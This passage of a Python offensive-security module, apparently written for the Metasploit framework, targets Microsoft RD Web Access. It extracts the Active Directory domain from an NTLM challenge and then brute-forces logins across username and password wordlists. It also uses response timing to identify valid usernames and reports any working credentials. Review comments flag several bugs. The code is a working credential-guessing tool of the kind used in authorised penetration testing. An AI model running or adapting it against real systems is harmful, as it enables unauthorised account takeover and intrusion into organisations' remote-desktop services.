        # self-signed RDWeb certs); allow_redirects=False keeps a redirect away
        # from the login page from being mistaken for a healthy 200.
        request = requests.get(url, headers=headers, timeout=(timeout / 1000), verify=False, allow_redirects=False)
        return request.status_code == 200 and 'RDWeb' in request.text
    except requests.exceptions.Timeout:
        return False
    except Exception as exc:
        module.log(str(exc), level='error')
        return False


def get_ad_domain(rhost, rport, user_agent):
    """Retrieve the NTLM domain out of a specific challenge/response

    Sends a fixed NTLM negotiate (Type 1) token to a list of common IIS
    paths; the first 401 carrying an NTLM challenge has the target name
    sliced out of its base64-decoded Type 2 message.  Returns the domain
    string on success, or None after logging an error when no path answered
    with a usable challenge.

    NOTE(review): unlike verify_service there is no try/except here, so a
    connection error or a challenge with an unexpected layout propagates
    to the caller.
    """
    domain_urls = ['aspnet_client', 'Autodiscover', 'ecp', 'EWS', 'OAB', 'Microsoft-Server-ActiveSync', 'PowerShell', 'rpc']
    # Static negotiate message; the server's challenge response carries the domain.
    headers = {'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==', 'User-Agent': user_agent, 'Host': rhost}
    session = requests.Session()
    for url in domain_urls:
        target_url = f"https://{rhost}:{rport}/{url}"
        request = session.get(target_url, headers=headers, verify=False)
        # Decode the provided NTLM Response to strip out the domain name
        if request.status_code == 401 and 'WWW-Authenticate' in request.headers and \
           'NTLM' in request.headers['WWW-Authenticate']:
            domain_hash = request.headers['WWW-Authenticate'].split('NTLM ')[1].split(',')[0]
            # NOTE(review): this is a heuristic slice, not an NTLM parser: it
            # assumes the NUL-stripped challenge splits on b'\n' with the
            # target name in the second chunk between 0x0f and 0x02.  An
            # unexpected layout raises IndexError/ValueError here.
            domain = base64.b64decode(bytes(domain_hash, 'utf-8')).replace(b'\x00',b'').split(b'\n')[1]
            domain = domain[domain.index(b'\x0f') + 1:domain.index(b'\x02')].decode('utf-8')
            module.log(f'Found Domain: {domain}', level='good')
            return domain
    module.log('Failed to find Domain', level='error')
    return None


def check_login(rhost, rport, targeturi, domain, username, password, timeout, user_agent) -> None:
    """Check a single login against the RDWeb Client
    The timeout is used to specify the amount of milliseconds where a response should consider the username invalid.

    Outcome mapping as implemented:
      302           -> credentials valid; module.report_correct_password
      200           -> username valid, password wrong; module.report_valid_username
      Timeout       -> username treated as invalid (logged at 'error')
      other status  -> logged only, nothing reported
      other request -> error logged (requests.exceptions.RequestException)
    """
    url = f'https://{rhost}:{rport}/{targeturi}'
    # NOTE(review): domain/username/password are interpolated without URL
    # encoding, so a value containing '&', '=' or '%' corrupts the form body.
    body = f'DomainUserName={domain}%5C{username}&UserPass={password}'
    headers = {'Host':rhost, 'User-Agent': user_agent, 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': f'{len(body)}', 'Origin': f'https://{rhost}'}
    session = requests.Session()
    # Extra fields passed through to the framework's credential reporting.
    report_data = {'domain':domain, 'address': rhost, 'port': rport, 'protocol': 'tcp', 'service_name':'RDWeb'}
    try:
        request = session.post(url, data=body, headers=headers, timeout=(timeout / 1000), verify=False, allow_redirects=False)
        if request.status_code == 302:
            module.log(f'Login {domain}\\{username}:{password} is valid!', level='good')
            module.report_correct_password(username, password, **report_data)
        elif request.status_code == 200:
            # NOTE(review): .microseconds is only the sub-second component of
            # the elapsed time, so the logged figure under-reports responses
            # that took a second or more.
            module.log(f'Password {password} is invalid but {domain}\\{username} is valid! Response received in {request.elapsed.microseconds / 1000} milliseconds', level='good')
            module.report_valid_username(username, **report_data)
        else:
            module.log(f'Received unknown response with status code: {request.status_code}')
    except requests.exceptions.Timeout:
        module.log(f'Login {domain}\\{username}:{password} is invalid! No response received in {timeout} milliseconds', level='error')
    except requests.exceptions.RequestException as exc:
        module.log('{}'.format(exc), level='error')
    return


def check_logins(rhost, rport, targeturi, domain, usernames, passwords, timeout, user_agent) -> None:
    """Check each username and password combination

    Iterates the full cartesian product (every password for every username)
    sequentially, stripping surrounding whitespace/newlines from entries
    that came from wordlist files.
    """
    for (username, password) in list(itertools.product(usernames, passwords)):
        check_login(rhost, rport, targeturi, domain, username.strip(), password.strip(), timeout, user_agent)


def run(args) -> None:
    """Run the module, gathering the domain if desired and verifying usernames and passwords

    Args:
        args: option mapping supplied by the framework; reads RHOSTS, rport,
            targeturi, timeout, user_agent, verify_service, domain,
            enum_domain, username and password.
    """
    module.LogHandler.setup(msg_prefix='{} - '.format(args['RHOSTS']))
    if DEPENDENCIES_MISSING:
        module.log('Module dependencies are missing, cannot continue', level='error')
        return
    user_agent = args['user_agent']
    # Verify the service is up if requested
    if args['verify_service']:
        service_verified = verify_service(args['RHOSTS'], args['rport'], args['targeturi'], int(args['timeout']), user_agent)
        if service_verified:
            module.log('Service is up, beginning scan...', level='good')
        else:
            module.log(f'Service appears to be down, no response in {args["timeout"]} milliseconds', level='error')
            return
    # Gather AD Domain either from args or enumeration
    domain = args['domain'] if 'domain' in args else None
    if not domain and args['enum_domain']:
        domain = get_ad_domain(args['RHOSTS'], args['rport'], user_agent)
    # Verify we have a proper domain
    if not domain:
        module.log('Either domain or enum_domain must be set to continue, aborting...', level='error')
        return
    # Gather usernames and passwords for enumeration
    # 'username'/'password' are each either a literal value or a path to a
    # wordlist; file lines keep their newline here and are stripped later.
    if os.path.isfile(args['username']):
        with open(args['username'], 'r') as file_contents:
            usernames = file_contents.readlines()
    else:
        usernames = [args['username']]
    if 'password' in args and os.path.isfile(args['password']):
        with open(args['password'], 'r') as file_contents:
            passwords = file_contents.readlines()
    elif 'password' in args and args['password']:
        passwords = [args['password']]
    else:
        # No password given: one deliberately wrong value is all the
        # timing-based username check needs.
        passwords = ['wrong']
    # Check each valid login combination
    check_logins(args['RHOSTS'], args['rport'], args['targeturi'], domain, usernames, passwords, int(args['timeout']), user_agent)


if __name__ == '__main__':
    module.run(metadata, run)